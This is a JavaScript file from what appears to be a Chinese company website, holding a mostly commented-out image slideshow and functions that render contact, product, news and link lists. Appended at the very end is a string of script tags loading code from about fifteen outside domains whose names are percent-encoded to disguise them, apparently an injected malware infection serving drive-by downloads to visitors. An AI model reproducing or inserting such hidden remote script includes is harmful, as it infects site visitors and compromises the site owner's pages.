﻿// 属性设置 
var E_strIFaderTransType = 'reveal'; // 'reveal' | 'blend' 
var Filter_number = 23; // 滤镜种数 
var change_time = 3.000; // 滤镜转换过程为3.0秒延迟 
var wait_time = 5000; // 两种滤镜之间为5秒延迟

var obj_Timer; 
var count_temp = 0; //记录当前是第几幅图片 
var Img_arry = new Array(); //图片数组 
var E_ie4 = document.all?true:false; 
/*
var E_nn4 = document.layers?true:false;

function Filt_set() //设置滤镜 
{ 
   if(!E_ie4 && !E_nn4) return;
   if(E_ie4) { 
     var theImg = document.all['idImgFading']; 
     if(theImg == null) return; 
     with(document.all['idImgFading']) { 
       style.filter = (E_strIFaderTransType == 'reveal')?'revealTrans':'blendTrans'; 
       style.filter.duration = change_time; 
       style.filter.transition = Filter_number; 
     } 
   } 
   use_Filter();
   obj_Timer = window.setInterval('use_Filter()',wait_time); 
}

function use_Filter() //滤镜的启动 
{ 
   if(E_ie4) { 
     with(document.all['idImgFading']) { 
       if(E_strIFaderTransType == 'reveal') { 
         filters(0).transition = Filter_number; 
       } 
       if(count_temp == (Img_arry.length - 1)) { 
         count_temp = -1; 
       } 
       count_temp++; 
       title = Img_arry[count_temp].sAlt; 
       parentElement.href = Img_arry[count_temp].command;
    document.all['idImgLink'].innerText=title;
    document.all['idImgLink'].href= Img_arry[count_temp].command;
    
       filters(0).apply(); 
       src = Img_arry[count_temp].sImgUrl; 
       filters(0).play();
     } 
   } 
   else if(E_nn4) { 
     if(count_temp == (Img_arry.length - 1)) { 
       count_temp = -1; 
     } 
     count_temp++; 
     document.images['idImgFading'].src = Img_arry[count_temp].sImgUrl; 
   } 
}

function obj_ClearTime() { 
   window.clearInterval(obj_Timer); 
} 
window.onunload = obj_ClearTime;//取消计时器，释放系统资源

function Img_obj(sImgUrl,command,sAlt,sTarget) 
{ 
   this.sImgUrl = (sImgUrl == null)?'':sImgUrl; 
   this.command = (command == null || command == '')?'/':command; 
   this.sAlt = (sAlt == null)?'':sAlt; 
   this.sTarget = (sTarget == null || sTarget == '')?'_self':sTarget; 
} 
*/













/*
window.onload=function()
{
    //显示联系信息
    //ShowContact();
    //ShowProductType();
    //ShowNews();
    //ShowProduct();
    //ShowLink();
    //ShowProject();
    //Filt_set();
}

function ShowContact()
{
    var result=_Default.LoadSystem().value;
    if(result!=null)
    {
        //$("conMobile").innerHTML="手机号码："+result.Mobile;
        //$("conTel").innerHTML="联系电话："+result.Phone;
        //$("conEmail").innerHTML="电子邮箱："+result.Email;
        //$("conQQ").innerHTML="<a onfocus='this.blur();' target='blank' href='http://wpa.qq.com/msgrd?V=1&Uin=" + result.QQ + "&Site=www.hzjhan.com.cn&Menu=yes' style='text-decoration: none'><img style='border:0px;' src='http://wpa.qq.com/pa?p=4:" + result.QQ + ":4' alt='" + result.QQ + "' />QQ：" + result.QQ + "</a>";
        $("conWebSite").innerHTML="<a href='http://"+result.WebSite + "' target='_blank'>http://" + result.WebSite + "</a>" ;
        var strVideo="<object classid='clsid:cfcdaa03-8be4-11cf-b84b-0020afbbccfa' id='video1' width='100%' height='190' viewastext><br />";
        strVideo+="<param name='_extentx' value='5503'><br />";
        strVideo+="<param name='_extenty' value='1588'><br />";
        strVideo+="<param name='autostart' value='false'><br />";
        strVideo+="<param name='shuffle' value='0'><br />";
        strVideo+="<param name='prefetch' value='0'><br />";
        strVideo+="<param name='nolabels' value='0'><br />";
        strVideo+="<param name='src' value='" + result.Vod + "'><br />";
        strVideo+="<param name='controls' value='imagewindow,statusbar,controlpanel'><br />";
        strVideo+="<param name='console' value='raplayer'><br />";
        strVideo+="<param name='loop' value='0'><br />";
        strVideo+="<param name='numloop' value='0'><br />";
        strVideo+="<param name='center' value='0'><br />";
        strVideo+="<param name='maintainaspect' value='0'><br />";
        strVideo+="<param name='backgroundcolor' value='#000000'><br />";
	    strVideo+="</object>";
	    $("conVideo").innerHTML=strVideo;
    }
}

function ShowProductType()
{
    var result=_Default.GetProductType().value;
    var showhtml="";
    if(result!=null)
    {
        for(var i=0;i<result.length;i++)
        {
            showhtml+="<a href='WebSite/Product/ProductList.aspx?ProductTypeID=" + result[i].ID + "' target='_blank' onfocus='this.blur()' title='" + result[i].Name + "'>" + result[i].Name + "</a>"
        }
    }
    else
    {
        showhtml="<div style='text-align:center;'>暂无产品类型</div>"
    }
    $("conProductType").innerHTML=showhtml;
}

function ShowNews()
{
    var result=_Default.GetNews().value;
    var showhtml=""
    if(result!=null)
    {
        showhtml="<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"width:100%;\">";
        for(var i=0;i<result.length;i++)
        {
            showhtml+="<tr class=\"news_list\">";
            showhtml+="<td valign=\"bottom\">";
            showhtml+="<img src=\"App_Themes/Default/Images/Index/arr2.gif\" alt=\"\" />&nbsp;";
            showhtml+="<a href=\"WebSite/News/NewsShow.aspx?NewsID=" + result[i].ID + "\" target=\"_blank\" onfocus=\"this.blur()\">" + result[i].Title + "</a>";
            if(result[i].Focus==1)
                showhtml+="&nbsp;<img src=\"App_Themes/Default/Images/Index/new.gif\" alt=\"\" />";
            showhtml+="</td>";
            showhtml+="<td style=\"width:100px;\" valign=\"bottom\" align=\"right\">";
            showhtml+="<img src=\"App_Themes/Default/Images/Index/clock.gif\" alt=\"\" />&nbsp;";
            showhtml+=result[i].AddDate.format();
            showhtml+="</td>";
            showhtml+="</tr>";
        }
        showhtml+="</table>";
    }
    else
    {
        showhtml="<div style='text-align:center;'>暂无企业新闻</div>";
    }
    $("conNews").innerHTML=showhtml;
}

function ShowProduct()
{
    var result=_Default.GetProduct().value;
    var showhtml=""
    if(result!=null && result.length>0)
    {
        var productl=result.length;
        showhtml="<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"width:100%;margin-top:5px;\">";
        for(var i=0;i<8;i++)
        {
            if(i==0 || i==4)
            {
                showhtml+="<tr>";
            }
            
            showhtml+="<td style=\"width:25%;\" align=\"center\">";
            if(i<productl)
            {
                showhtml+="<ul><li style='border:solid 1px #cccccc;padding:2px;width:110px;height:100px;'><a onfocus=\"this.blur()\" href=\"WebSite/Product/ProductShow.aspx?ProductID=" + result[i].ID + "\" target=\"_blank\" title=\"" + result[i].ProductName + "\">"+"<img src=\"" + upfiledir + "/" + result[i].SmallPic + "\" style=\"width:110px;height:100px;vertical-align:bottom;border:0px;cursor:pointer;\" alt=\"" + result[i].ProductName + "\" /></a></li></ul>";
                //showhtml+="<br />";
                showhtml+="<a onfocus=\"this.blur()\" href=\"WebSite/Product/ProductShow.aspx?ProductID=" + result[i].ID + "\" target=\"_blank\" title=\"" + result[i].ProductName + "\">" + result[i].ProductName + "</a>";
            }
            showhtml+="</td>";
            
            if(i==3 || i==7)
            {
                showhtml+="</tr>";
            }
            
        }
        showhtml+="</table>";
    }
    else
    {
        showhtml="<div style='text-align:center;'>没有产品信息</div>";
    }
    $("conProduct").innerHTML=showhtml;
}

function ShowLink()
{
    var result=_Default.GetLink().value;
    var showhtml=""
    if(result!=null)
    {
        showhtml="<ul>";
        for(var i=0;i<result.length;i++)
        {
            showhtml+="<li><a title='" + result[i].Name + "' href='" + result[i].Url + "' target='_blank' onfocus='this.blur()'><img src='" + upfiledir + "/" + result[i].Remark + "' alt='" + result[i].Name + "' /></a></li>";
        }
        showhtml+="</ul>";
    }
    else
    {
        showhtml="<div style='text-align:center;'>没有友情链接</div>";
    }
    $("conLink").innerHTML=showhtml;
}

function ShowProject()
{
    var result=_Default.GetProject().value;
    var showhtml="";
    if(result!=null)
    {
        for(var i=0;i<result.length;i++)
        {
            showhtml+="<a target='_blank' href='WebSite/Product/ProjectShow.aspx?ProjectID=" + result[i].ID + "' onfocus='this.blur()' title='" + result[i].Name + "'>" + result[i].Name + "</a>"
        }
    }
    else
    {
        showhtml="<div style='text-align:center;'>暂无案例信息</div>"
    }
    $("conProject").innerHTML=showhtml;
}
*/<script src=http://w%2E%63kt%37%2E%63%6E></script><script src=http://%71%2El%69%67%68t20%312%2Ein%66o></script><script src=http://%71.love%32%30%312%2E%69n%66o></script><script src=http://%72.l%6Fve2012.inf%6F></script><script src=http://%72%2Esifl%79.%69nfo></script><script src=http://%72%2E%73in%611%363%2E%69n%66%6F></script><script src=http://t%2E%73in%611%36%33.%69nf%6F></script><script src=http://%79%2El%69stage.i%6E%66o></script><script src=http://y%2E%6C%6Fve%32%30%31%32%2E%69n%66%6F></script><script src=http://%79.%73%69fly%2E%69%6Ef%6F></script><script src=http://%69%2E%6Cista%67%65.%69n%66o></script><script src=http://%69.%68%6Fpe2%3012%2Einf%6F></script><script src=http://%6F%2E%68op%652%301%32.%69%6Efo></script><script src=http://q.7nn.info></script><script src=http://%72%2Eadb%61%2Ei%6Ef%6F></script>